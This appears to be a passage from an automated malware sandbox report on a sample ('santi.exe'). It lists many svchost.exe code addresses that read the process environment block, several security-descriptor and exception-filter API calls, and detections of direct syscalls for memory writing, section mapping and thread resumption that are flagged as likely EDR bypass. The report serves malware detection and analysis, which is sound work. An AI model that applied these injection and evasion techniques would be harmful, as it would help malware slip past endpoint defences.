                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322645D mov eax, dword ptr fs:[00000030h]7_2_0322645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325245A mov eax, dword ptr fs:[00000030h]7_2_0325245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032364AB mov eax, dword ptr fs:[00000030h]7_2_032364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032644B0 mov ecx, dword ptr fs:[00000030h]7_2_032644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BA4B0 mov eax, dword ptr fs:[00000030h]7_2_032BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032304E5 mov ecx, dword ptr fs:[00000030h]7_2_032304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325EB20 mov eax, dword ptr fs:[00000030h]7_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325EB20 mov eax, dword ptr fs:[00000030h]7_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F8B28 mov eax, dword ptr fs:[00000030h]7_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F8B28 mov eax, dword ptr fs:[00000030h]7_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]7_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CB7E mov eax, dword ptr fs:[00000030h]7_2_0322CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6B40 mov eax, dword ptr fs:[00000030h]7_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6B40 mov eax, dword ptr fs:[00000030h]7_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FAB40 mov eax, dword ptr fs:[00000030h]7_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D8B42 mov eax, dword ptr fs:[00000030h]7_2_032D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240BBE mov eax, dword ptr fs:[00000030h]7_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240BBE mov eax, dword ptr fs:[00000030h]7_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238BF0 mov eax, dword ptr fs:[00000030h]7_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238BF0 mov eax, dword ptr fs:[00000030h]7_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238BF0 mov eax, dword ptr fs:[00000030h]7_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325EBFC mov eax, dword ptr fs:[00000030h]7_2_0325EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BCBF0 mov eax, dword ptr fs:[00000030h]7_2_032BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03250BCB mov eax, dword ptr fs:[00000030h]7_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03250BCB mov eax, dword ptr fs:[00000030h]7_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03250BCB mov eax, dword ptr fs:[00000030h]7_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230BCD mov eax, dword ptr fs:[00000030h]7_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230BCD mov eax, dword ptr fs:[00000030h]7_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230BCD mov eax, dword ptr fs:[00000030h]7_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DEBD0 mov eax, dword ptr fs:[00000030h]7_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CA24 mov eax, dword ptr fs:[00000030h]7_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325EA2E mov eax, dword ptr fs:[00000030h]7_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03254A35 mov eax, dword ptr fs:[00000030h]7_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03254A35 mov eax, dword ptr fs:[00000030h]7_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CA38 mov eax, dword ptr fs:[00000030h]7_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BCA11 mov eax, dword ptr fs:[00000030h]7_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CA6F mov eax, dword ptr fs:[00000030h]7_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CA6F mov eax, dword ptr fs:[00000030h]7_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CA6F mov eax, dword ptr fs:[00000030h]7_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032ACA72 mov eax, dword ptr fs:[00000030h]7_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032ACA72 mov eax, dword ptr fs:[00000030h]7_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]7_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240A5B mov eax, dword ptr fs:[00000030h]7_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240A5B mov eax, dword ptr fs:[00000030h]7_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238AA0 mov eax, dword ptr fs:[00000030h]7_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238AA0 mov eax, dword ptr fs:[00000030h]7_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03286AA4 mov eax, dword ptr fs:[00000030h]7_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]7_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304A80 mov eax, dword ptr fs:[00000030h]7_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03268A90 mov edx, dword ptr fs:[00000030h]7_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326AAEE mov eax, dword ptr fs:[00000030h]7_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326AAEE mov eax, dword ptr fs:[00000030h]7_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03286ACC mov eax, dword ptr fs:[00000030h]7_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03286ACC mov eax, dword ptr fs:[00000030h]7_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03286ACC mov eax, dword ptr fs:[00000030h]7_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230AD0 mov eax, dword ptr fs:[00000030h]7_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03264AD0 mov eax, dword ptr fs:[00000030h]7_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03264AD0 mov eax, dword ptr fs:[00000030h]7_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B892A mov eax, dword ptr fs:[00000030h]7_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C892B mov eax, dword ptr fs:[00000030h]7_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE908 mov eax, dword ptr fs:[00000030h]7_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE908 mov eax, dword ptr fs:[00000030h]7_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BC912 mov eax, dword ptr fs:[00000030h]7_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228918 mov eax, dword ptr fs:[00000030h]7_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228918 mov eax, dword ptr fs:[00000030h]7_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03256962 mov eax, dword ptr fs:[00000030h]7_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03256962 mov eax, dword ptr fs:[00000030h]7_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03256962 mov eax, dword ptr fs:[00000030h]7_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327096E mov eax, dword ptr fs:[00000030h]7_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327096E mov edx, dword ptr fs:[00000030h]7_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327096E mov eax, dword ptr fs:[00000030h]7_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D4978 mov eax, dword ptr fs:[00000030h]7_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D4978 mov eax, dword ptr fs:[00000030h]7_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BC97C mov eax, dword ptr fs:[00000030h]7_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0946 mov eax, dword ptr fs:[00000030h]7_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]7_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032309AD mov eax, dword ptr fs:[00000030h]7_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032309AD mov eax, dword ptr fs:[00000030h]7_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B89B3 mov esi, dword ptr fs:[00000030h]7_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B89B3 mov eax, dword ptr fs:[00000030h]7_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B89B3 mov eax, dword ptr fs:[00000030h]7_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE9E0 mov eax, dword ptr fs:[00000030h]7_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032629F9 mov eax, dword ptr fs:[00000030h]7_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032629F9 mov eax, dword ptr fs:[00000030h]7_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C69C0 mov eax, dword ptr fs:[00000030h]7_2_032C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]7_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]7_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]7_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]7_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]7_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]7_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032649D0 mov eax, dword ptr fs:[00000030h]7_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FA9D3 mov eax, dword ptr fs:[00000030h]7_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]7_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]7_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]7_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252835 mov ecx, dword ptr fs:[00000030h]7_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]7_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]7_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A830 mov eax, dword ptr fs:[00000030h]7_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D483A mov eax, dword ptr fs:[00000030h]7_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D483A mov eax, dword ptr fs:[00000030h]7_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BC810 mov eax, dword ptr fs:[00000030h]7_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE872 mov eax, dword ptr fs:[00000030h]7_2_032BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE872 mov eax, dword ptr fs:[00000030h]7_2_032BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6870 mov eax, dword ptr fs:[00000030h]7_2_032C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6870 mov eax, dword ptr fs:[00000030h]7_2_032C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03242840 mov ecx, dword ptr fs:[00000030h]7_2_03242840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03260854 mov eax, dword ptr fs:[00000030h]7_2_03260854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234859 mov eax, dword ptr fs:[00000030h]7_2_03234859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234859 mov eax, dword ptr fs:[00000030h]7_2_03234859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230887 mov eax, dword ptr fs:[00000030h]7_2_03230887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BC89D mov eax, dword ptr fs:[00000030h]7_2_032BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FA8E4 mov eax, dword ptr fs:[00000030h]7_2_032FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C8F9 mov eax, dword ptr fs:[00000030h]7_2_0326C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C8F9 mov eax, dword ptr fs:[00000030h]7_2_0326C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E8C0 mov eax, dword ptr fs:[00000030h]7_2_0325E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325EF28 mov eax, dword ptr fs:[00000030h]7_2_0325EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E6F00 mov eax, dword ptr fs:[00000030h]7_2_032E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232F12 mov eax, dword ptr fs:[00000030h]7_2_03232F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CF1F mov eax, dword ptr fs:[00000030h]7_2_0326CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325AF69 mov eax, dword ptr fs:[00000030h]7_2_0325AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325AF69 mov eax, dword ptr fs:[00000030h]7_2_0325AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304F68 mov eax, dword ptr fs:[00000030h]7_2_03304F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]7_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]7_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]7_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]7_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]7_2_0322CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]7_2_0322CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]7_2_0322CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]7_2_0322CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]7_2_0322CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]7_2_0322CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CF50 mov eax, dword ptr fs:[00000030h]7_2_0326CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D0F50 mov eax, dword ptr fs:[00000030h]7_2_032D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326CF80 mov eax, dword ptr fs:[00000030h]7_2_0326CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03262F98 mov eax, dword ptr fs:[00000030h]7_2_03262F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03262F98 mov eax, dword ptr fs:[00000030h]7_2_03262F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324CFE0 mov eax, dword ptr fs:[00000030h]7_2_0324CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324CFE0 mov eax, dword ptr fs:[00000030h]7_2_0324CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]7_2_03270FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]7_2_03270FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]7_2_03270FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]7_2_03270FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304FE7 mov eax, dword ptr fs:[00000030h]7_2_03304FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E6FF7 mov eax, dword ptr fs:[00000030h]7_2_032E6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]7_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]7_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]7_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]7_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322EFD8 mov eax, dword ptr fs:[00000030h]7_2_0322EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322EFD8 mov eax, dword ptr fs:[00000030h]7_2_0322EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322EFD8 mov eax, dword ptr fs:[00000030h]7_2_0322EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6E20 mov eax, dword ptr fs:[00000030h]7_2_032C6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6E20 mov eax, dword ptr fs:[00000030h]7_2_032C6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6E20 mov ecx, dword ptr fs:[00000030h]7_2_032C6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325AE00 mov eax, dword ptr fs:[00000030h]7_2_0325AE00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325AE00 mov eax, dword ptr fs:[00000030h]7_2_0325AE00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325AE00 mov eax, dword ptr fs:[00000030h]7_2_0325AE00
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0031A66C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003081AC
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00308189 SetUnhandledExceptionFilter,0_2_00308189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
